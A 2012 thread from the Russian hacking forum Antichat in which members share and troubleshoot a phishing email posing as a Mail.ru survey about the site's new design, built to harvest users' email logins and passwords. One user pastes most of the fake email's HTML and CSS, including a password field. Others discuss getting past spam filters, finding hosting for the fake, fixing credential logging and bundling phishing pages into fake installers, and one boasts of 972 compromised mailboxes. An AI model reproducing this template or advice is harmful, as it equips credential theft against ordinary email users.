ANTICHAT

ANTICHAT (https://forum.antichat.io/index.php)
-   Уязвимости Mail-сервис (https://forum.antichat.io/forumdisplay.php?f=14)
-   -   Фейк оценка интерфейса в теле письма (https://forum.antichat.io/showthread.php?t=8055199)

Mr.net 08.04.2012 01:00

фейк испытание прошел успешно..
спасибо за спасибо..

sadovnik 08.04.2012 01:00

Молодчик))

Mr.net 08.04.2012 01:00

Все мы знаем что mail.ru недавно поменяли свой дизайн и как не странно они пытаются лихорадочно узнать мнение и оценку пользователей нового дизайна и тут меня осенило ,а почему бы и нет? ведь тема очень популярна среди пользователей,покажите мне хоть одного пользователя который не заметил что на mail.ru сменился дизайн,всем приходили письма ,и в подробностях расписывали нам о новом интерфейсе,так вот не долго думая,я по быстренькому создал простенький фейк ,который в принципе не предназначен объективно взломать одного пользователя ,этот фейк на мой взгляд имеет универсальность в какой то степени,эдакую многогранность.....

Никаких предупреждений и угроз,не будем напрягать пользователей,пусть они нам сливают в тихой и мирной обстановке свои данные....
заметьте что добавлено поле для сообщения,это в какой то степени приоритет ,вы узнаете много нового что думают о вас пользователи,наверно будут встречаться и такие которые прочухают что им в паривают фейк и возможно даже захотят с вами связаться ,возможно сделать заказ ,в любом случае вы узнаете много нового о себе и своих возможностях ,ну чтож фантазировать можно бесконечно...настало время выложить фейк..

Скриншот..

IMAGE http://i5.pixs.ru/storage/5/6/8/20png_5478030_4498568.png

код:

Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

php скрипт ..

Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

удачного взлома...

Dinga 08.04.2012 01:00

Ништяк, новый фейк, спасибо!
хоть я их и не использую...

stivens20 08.04.2012 01:00

Большое ламерское спасибо!

stivens20 09.04.2012 01:00

Цитата:

Сообщение от Mr.net

фейк испытание прошел успешно..

Первый раз отправился,а вот второго раза не было

Yorvet 09.04.2012 01:00

Цитата:

Сообщение от stivens20

Первый раз отправился,а вот второго раза не было

Под испытаниями понимается не количество удачных отправок, а количество пойманых жертв.

stivens20 09.04.2012 01:00

Цитата:

Сообщение от Yorvet

Под испытаниями понимается не количество удачных отправок, а количество пойманых жертв.

До жертвы дойти надо,чтоб ее поймать.

chelyuskin 09.04.2012 01:00

идея и исполнение отличное! молодца!)

Mr.net 14.04.2012 01:00

Цитата:

Сообщение от MrRed

Блин,в спам идёт.

проблема в хостинге ,а не в фейке...создай себе уже нормальный хостинг сколько можно пользоваться третьего сорта..

MrRed 14.04.2012 01:00

Блин,в спам идёт.

Aman4ik 19.04.2012 01:00

все отлично работает спасибо за труды

Mr.net 19.04.2012 01:00

Цитата:

Сообщение от Aman4ik

все отлично работает спасибо за труды

сработал эффективно ,как быстро взломал мыло?

Levontik 22.04.2012 01:00

Как это использовать? Что делать с этим кодом, где вообще прочитать какой нибудь faq по всему этому?

Kirill654 22.04.2012 01:00

Включи мозги...Пользуйся поиском- google.ru
В разделе файлы есть видос "Фейк в теле письма на mail.ru"
Там все подробно показано.

tomichek) 22.04.2012 01:00

Цитата:

Сообщение от Mr.net

Все мы знаем что mail.ru недавно поменяли свой дизайн и как не странно они пытаются лихорадочно узнать мнение и оценку пользователей нового дизайна и тут меня осенило ,а почему бы и нет? ведь тема очень популярна среди пользователей,покажите мне хоть одного пользователя который не заметил что на mail.ru сменился дизайн,всем приходили письма ,и в подробностях расписывали нам о новом интерфейсе,так вот не долго думая,я по быстренькому создал простенький фейк ,который в принципе не предназначен объективно взломать одного пользователя ,этот фейк на мой взгляд имеет универсальность в какой то степени,эдакую многогранность.....

Никаких предупреждений и угроз,не будем напрягать пользователей,пусть они нам сливают в тихой и мирной обстановке свои данные....
заметьте что добавлено поле для сообщения,это в какой то степени приоритет ,вы узнаете много нового что думают о вас пользователи,наверно будут встречаться и такие которые прочухают что им в паривают фейк и возможно даже захотят с вами связаться ,возможно сделать заказ ,в любом случае вы узнаете много нового о себе и своих возможностях ,ну чтож фантазировать можно бесконечно...настало время выложить фейк..

Скриншот..

IMAGE http://i5.pixs.ru/storage/5/6/8/20png_5478030_4498568.png

код:

Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

php скрипт ..

Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

удачного взлома...

Здоров,Mr.net!) Лучше бы подумал как, свои фейк/и в body реализовать,т.н.проги-исходника: "magent-а.exe". Думаю, ты понял о чём говорю... Body своего фейка/ов экспортировать в body.exe

Yorvet 22.04.2012 01:00

Каждый день убеждаюсь, что идиотизм не истребим как фрагмент характера.

Yorvet 23.04.2012 01:00

Лучше получать и интегрировать их в "мозг".

tomichek) 23.04.2012 01:00

Цитата:

Сообщение от Yorvet

Лучше получать и интегрировать их в "мозг".

Ну и? Вот именно, это тебе не просто перешил по ссылке, засейвил страницу, децл сделал над ней ребрейдинг, и всё. А это написать оболочку к ней, и найти/сообразить новый оригинальный, и не тривиальный способ сплава(общее доступного) фейка. В моём предложении, чтобы это провернуть, надо иметь склад опыта в написании левого скрипта+взл ПО тем самым creat фишинговое ПО выпустить, т.е. сделать оригинальный, т.н. фейк следовательно repack выпускать в setup.exe под видом проги. То, что ты левый фекй просто зальёшь на хост(без рекламы), фэто старая байка, и не имеет оригинальности. Через некоторое время даже пенсионеры будут про, эту байку знать. Так, что интегрируй знания в свой мозг, подключай опыт(если он есть), и пиши Фишинг(ПО). С разновидными фейками.

Yorvet 23.04.2012 01:00

Кажется, это ты только что просил кого-то сделать за тебя работу, не я. В своих инструментах я не сомневаюсь.
Много умных слов ты сказал, а смысл? Нужно - сделай.

virtuoso_ 23.04.2012 01:00

Если по теме фейк отпугивает. Ты бы стал писать письмо о новом интерфейсе ? А тем более писать свой email и pass.
p.s Вывод делай сам !!!

Mr.net 23.04.2012 01:00

Цитата:

Сообщение от virtuoso_

Если по теме фейк отпугивает. Ты бы стал писать письмо о новом интерфейсе ? А тем более писать свой email и pass.
p.s Вывод делай сам !!!

фейк работает эффективно ,он себя уже показал и доказал..
посты иди набивай в другую тему,понял ,да...

PsiBoX 23.04.2012 01:00

Цитата:


Если по теме фейк отпугивает. Ты бы стал писать письмо о новом интерфейсе ? А тем более писать свой email и pass.
p.s Вывод делай сам !!!



virtuoso_, легко сидеть и кричать.
Было нечего делать, поднял старые базы мыл, чуть подредактировал фейк (дабы спам-фильтр не лочил), проспамил 3к ящиков.
На выходе - 972 валидных ящика за 3 дня. Не столь много, но пробив в 30% достаточно высок.
Если рассылать по "целевой" аудитории, можно добиться и более высоких результатов.

haker247 23.04.2012 01:00

доходит только половина письма что делать?

tomichek) 23.04.2012 01:00

Цитата:

Сообщение от Yorvet

Каждый день убеждаюсь, что идиотизм не истребим как фрагмент характера.

Эм...хакерство не имеет границ! На одном колесе далеко не уедешь, соответственно, нужно придумывать новые идеи, и интегрировать в "body".

LakyBoy 24.04.2012 01:00

У меня сё отлично, но в начале страницы вот это:
IMAGE http://s19.radikal.ru/i192/1204/d8/d4ba06b5255e.jpg

Как исправить?

Yorvet 24.04.2012 01:00

Судя по всему, хостинг фиговый.

rebul-x1x1 25.04.2012 01:00

класс что то новое)

ZENON 25.04.2012 01:00

/offtop/
Цитата:

Сообщение от tomichek)

Ну и? Вот именно, это тебе не просто перешил по ссылке, засейвил страницу, децл сделал над ней ребрейдинг, и всё. А это написать оболочку к ней, и найти/сообразить новый оригинальный, и не тривиальный способ сплава(общее доступного) фейка. В моём предложении, чтобы это провернуть, надо иметь склад опыта в написании левого скрипта+взл ПО тем самым creat фишинговое ПО выпустить, т.е. сделать оригинальный, т.н. фейк следовательно repack выпускать в setup.exe под видом проги. То, что ты левый фекй просто зальёшь на хост(без рекламы), фэто старая байка, и не имеет оригинальности. Через некоторое время даже пенсионеры будут про, эту байку знать. Так, что интегрируй знания в свой мозг, подключай опыт(если он есть), и пиши Фишинг(ПО). С разновидными фейками.

Блин, я язык сломал читать эту байду, возможно ход мыслей и правильный,
но выражение - смесь какая то!,
автор цитаты возможно решил блеснуть остроумием и познанием жаргона., итог печален! //offtop/

Mr.net 25.04.2012 01:00

нашел хостинг для отправки фейков,на первый взгляд выглядит солидно,тестовый периуд 20 дней ,для фейков думаю само нормально будет http://statushost.ru/test.html

sojetsu 26.04.2012 01:00

Проблема логи не приходят ((
хост у меня на hut4.ru
анонимка http://vhont.hut4.ru/

Скрипт

.support_block {text-align:left; width:90%; margin-top:20px;}
.support_block h1 {/*margin: 0 0 20px 35px;*/ margin: 0 0 18px; color:#023473; font-size:2.1em; font-weight:normal;}
.support_block h2 {margin:0; padding:10px 0 0 22px; color:#023473; font-size:1.5em; font-weight:normal;}
.sb_lmenu { width: 292px; float:right; padding:47px 34px 20px 19px;}
.sb_lmenu ul, .sb_lmenu li {list-style:disc; margin:.8em 0 0 .5em; padding:0 0 0 .3em; color:#dcdee1;}
.sb_lmenu ul{margin-left: 22px; padding:0;}
.sb_lmenu ul {width:270px}
.sb_lmenu h2 {width:270px}
.sb_lmenu li {/*margin-left:20px;*/ margin-left:15px;}
.sb_lmenu div.cbox {background:#f1f6fb; padding: 5px 0 25px; margin-bottom:15px;}
.sbl_ind {padding-top:50px;}
.sbl_rcm {border:1px solid #eee; margin:0; padding:7px 10px 10px 60px; background:url('http://img.mail.ru/r/support_flag.gif') no-repeat 5px 7px;}
.sbl_rcm p {display:block; width:204px}

.ipic {vertical-align:middle; margin:0 3px;}
.sb_cont {margin: 0 120px 20px 0px; padding:0;}
.sb_cont p {/*margin:1em 0*/ margin: 1em 0 15px;}
.sb_cont h2 {padding:0px 0 10px;}
.sb_cont dt {padding: 1.5em 0 0 0em; margin:0; font-weight:bold;}
.sb_cont dd {padding: .2em 0 0 0em; margin:0;}
.sb_cont dd.dd_ol {padding: 3px 0 0 0;}
.sb_cont ul, .sb_cont li {margin:.8em 0 0 1.2em; padding:0;}
.sb_cont li span, .sb_cont ol li {color:#000;}
.sb_cont ol {margin:0; padding:0; list-style:none;}
.sb_cont li {margin:0 0 3px 0;}
.sb_cont ol.dig {list-style:decimal; margin:0 0 1em 1em;}
.sb_cont ol.dig li {margin:0 0 3px 1em;}

.sb_cont p.crumbs {clear:left; /*margin-bottom:0;*/ margin-top:0;}
.osb_cont h1 {margin-left:0;}

.sb_menu {border:1px solid #d9d9d9; margin: 0 350px 0 36px; padding: 0 0 30px 0;}
.sb_menu ul, .sb_menu li {list-style:disc; margin:1.3em 0 0 1em; padding:0 0 0 .5em; font-size:1em; color:#dcdee1;}
.sb_menu ul {margin:0; padding:0 0 0 28px;}
.sb_menu h2 {padding:14px 0 0 24px;}
.sb_menu a.sm {font-size:.92em}
.sb_menu a.gr {color:#656972;}
.sb_menu_other {float:left; margin:0; width:100%; }
.sb_menu_other h2 {padding:0 0 10px 60px;}
.sb_menu_other ul {list-style:none; margin:0;}
.sb_menu_other li {margin:.7em 0 0 0; padding:0;}
table.sb_mo {width:100%; border-collapse:collapse; margin:0; padding:0;}
table.sb_mo td {width:20%; padding:0; padding-bottom:20px;}
table.sb_mo .sb_w {width:40%;}
table.sb_mo .sb_f {width:1%;}
table.sb_mo .sb_f div {width:60px}
table.sb_mo .sb_l div {width:350px;}
table.addr {width:450px;border-collapse:collapse; margin:0; padding:0}
table.addr td {margin:0; padding:0}
form.sbf {margin:0 0 10px 0; padding:0 25px 15px 25px; border:1px solid #ddd; min-width:500px;}
.sb_form {margin:.5em 0;}
.sb_form .gr {font-size:.7em; font-weight:bold; color:#575757; padding:2px 20px 15px 0}
.sb_form p.tah70_gr {margin:2px 0 7px;}
.sb_form input {margin:0;}
.sb_form input[type="text"], .sb_form input.w_100 {height:21px; width:200px;}
.sb_form input[type="password"], .sb_form input.w_100 {height:21px; width:283px;}
.sb_form table.addr input.w_100, .sb_form table.addr select {width:100%;}
.sb_form dt {margin:0 0 3px 0;}
.sb_form dt .tah70_gr {font-weight:normal}
.sb_form dt.sep {border-top:1px solid #ddd; padding-top:1.5em; margin-top:2.1em}
.sb_form dd.scrsht div {background-color:#eee; width:450px; overflow:hidden;}
.sb_form dd.scrsht input {width:auto; margin:10px 0 0 10px; position:absolute}
.sb_form dd.scrsht p {width:auto; margin:35px 0 10px 10px;}
.sb_form .textarea-wrapper {/*width:450px; */}
.sb_form textarea {height:100px; font-size:12px; width: 448px; margin:0; padding:0; overflow: auto;}
.sb_form .razlep {padding-left:5px;}
.copy_rq {padding:12px 0 8px 0;}
.sb_err {width:500px; padding-left:40px; display:none}

.foot {clear:both;width:100%;height:21px;margin:10px 0;padding:6px 0 0;background:#00468c;-moz-border-radius:3px;border-radius:3px;color:#fff;font-size:11px}
.foot .copy {position:absolute;padding:0 0 0 31px}
.foot .links {width:70%;padding-left:24%;text-align:center}
.foot * {color:#fff}

#let_body #first_let table {font-size:125%;}
#first_let a{color:#0857A6; text-decoration:underline}
#first_let a:hover{color:#F26D00; text-decoration:none}
#first_let td, #first_let th {vertical-align: top; text-align:;}
.wlcHeader {background: #00468c; width: 100%;}
.wlcTopLeft {width: 99%;}
.wlcTopRight {width: 1%; text-align: right;}
.wlcLogo {padding: 5px 0 5px 15px; vertical-align: middle;}
.wlcBotLeft {width: 99%; vertical-align: bottom;}
.wlcBotRight {width: 1%; text-align: right; vertical-align: bottom;}
.wlcMain {padding: 12px 0 0 10px;}
.wlcMain div {font-family: Arial, Helvetica, sans-serif;}
.wlcH1 {font-size: 150%; padding-bottom: 10px;}
.wlcH2 {font-size: 130%; padding-bottom: 5px;}
.wlcH3 {font-size: 110%; padding-bottom: 3px;}
.wlcItal {font-style: italic; font-size: 85%;}
.wlcGreen {color: #007236; font-style: italic; font-weight: bold;}
.wlcBlue {color: #0857a6; font-weight: bold;}
.wlcGrey {color: #bcbcbc;}
.wlcGrey a {color: #bcbcbc;}
.wlcHR {border-bottom: 1px solid #dadce5; line-height: 1px; font-size: 1px; overflow: hidden;}
.wlcProjects th {width: 2%;}
.wlcProjects th div {width: 75px;}
.wlcProjects td {width: 47%;}
.wlcProjects td a {width: 47%; font-weight: bold;}
.wlcTopLeft {width: 99%; background: #fbb53e;}
.wlcBlock .wlcTopRight {width: 1%; text-align: right; background: #fbb53e;}
.wlcBlock .wlcBotLeft {width: 99%; vertical-align: bottom; background: #ededed;}
.wlcBlock .wlcBotRight {width: 1%; text-align: right; vertical-align: bottom; background: #ededed;}
.wlcBlockTitle {padding: 5px 0 5px 15px; background: #fbb53e; border-bottom: 1px solid #d69a35; white-space: nowrap;}
.wlcBlockTitle div.wlcH3 {background: #fbb53e;}
.wlcBlockMail {padding: 8px 5px 8px 15px; border-top: 1px solid #ffffff; border-bottom: 1px solid #cacaca; background: #ededed;}
.wlcBlockMail div {white-space: nowrap; background: #ededed;}
.wlcBlockLinks {padding: 8px 5px 10px 15px; border-top: 1px solid #ffffff; background: #ededed;}
.mb20 {margin-bottom: 20px;}
.mb10 {margin-bottom: 10px;}
.mb5 {margin-bottom: 5px;}
.mb3 {margin-bottom: 3px;}
.pt30 {padding-top: 30px;}
.pt20 {padding-top: 20px;}
.pb5 {padding-bottom: 5px;}
.pb3 {padding-bottom: 3px;}
.img {visibility: hidden; position: absolute;}



















Уважаемый пользователь!



Расскажите нам о ваших впечатлениях о новом виде главной страницы Mail.Ru.
Стало ли вам удобнее пользоваться ей? Какие новые возможности хотелось бы увидеть?
Мы постараемся учесть ваши пожелания, чтобы сделать её лучше.




.textarea-wrapper .virtual-keyboard {position: absolute; right: 0px;}
.sb_lmenu{padding-top:0;}










Ваше сообщение:
Доступно: виртуальная клавиатура

Ваше имя:



@mail.ru@inbox.ru@bk.ru@list.ru

Пароль:

Если у вас нет доступа к данному почтовому ящику или вы не можете получать письма, то укажите альтернативный почтовый ящик для переписки со службой поддержки. Если у вас нет такого ящика — зарегистрируйте новый.



   





Вашем распоряжении:
- неограниченный объем почтового ящика;
- безопасность переписки, защита от спама и вирусов;
- быстрая загрузка фотографий, музыки и видео - пересылка до 20 гигабайт с письмом;
- красивое оформление письма в своем стиле.
Узнайте о новых возможностях почтового ящика




Mail.Ru - это не только почта.




Мой Мир@Mail.Ru
http://mir.mail.ru
Одна из самых популярных социальных сетей Рунета. В ней можно найти всех своих друзей, которые уже давно там зарегистрированы, узнать, как они живут, написать в микроблог, выложить фото и видео, поиграть в игры и т.д.
 

Агент@Mail.Ru
http://agent.mail.ru
Удобный, многофункциональный мессенджер, с помощью которого можно обмениваться мгновенными сообщениями, звонить на городские и мобильные телефоны прямо с компьютера, общаться посредством видеосвязи, отправлять бесплатные SMS и многое другое.





Игры@Mail.Ru
http://games.mail.ru
Крупнейший ресурс онлайн-игрушек. Найдутся игры на любой вкус, но самое главное – в них можно играть со своими друзьями.
 

Деньги@Mail.Ru
http://money.mail.ru
Безопасная и удобная платежная система, которая позволяет оплачивать большое количество услуг, например, сотовую связь и Интернет, без комиссии.

Пользуйтесь Mail.Ru и будьте счастливы! Все проекты Mail.Ru

Это удобно! Сделать Mail.Ru стартовой страницей

Это письмо создано автоматически, отвечать на него не нужно. Для связи со службой поддержки используйте, пожалуйста, адрес электронной почты support@corp.mail.ru.



что не так пасс пустой

";
?>

помагите

Laros water 26.04.2012 01:00

внимательно посмотри, как ты указал путь до обработчика!

sojetsu 26.04.2012 01:00

я не понял путь указывать на лог или логин?? или вобще на пасс.txt

вот php скрипт правильно?
";
?>

sojetsu 26.04.2012 01:00

не буду тут все разъяснять помогите в скаип очень прошу urban.game

BLEERD 02.05.2012 01:00

Да блин у тебя Ftp стоит в пути вместо HTTP (ftp://ruslan1.hut4.ru/log.php)
Я делал все так же(и хост тот же, и анонимка), на мыло письмо пришло, а вот после ввода ничего не сохраняет. Перечитал все темы Mr.net, не понял в чем дело, день убил, но думаю со временем найду косяк

Enig 08.05.2012 01:00

А что и этот уже убили ? или я туплю ?
Вот что маил в письме пишет
ВНИМАНИЕ!
Данное письмо содержит потенциально опасный HTML-код, заблокированный системой безопасности.
Возможно, оно отображается неправильно.

И в письме портятся поля ввода пароля и логина, так же убивает кнопку отправить и очистить.

Подскажите в каком месте кода копать ?
Или в чем моя ошибка ?

Kiebling 06.06.2012 01:00

Отлично! Великолепно!
Жалко что CSS блокируют.

BlackForest 06.06.2012 01:00

да блин достали, хватит апать не актуальные темы. сколько можно? думаешь что-то новое, а тут такая херня. долбаные археологи.

Kiebling 06.06.2012 01:00

Черный, не визжи!

rkra 11.06.2012 01:00

Суперр!СПС


Время: 02:36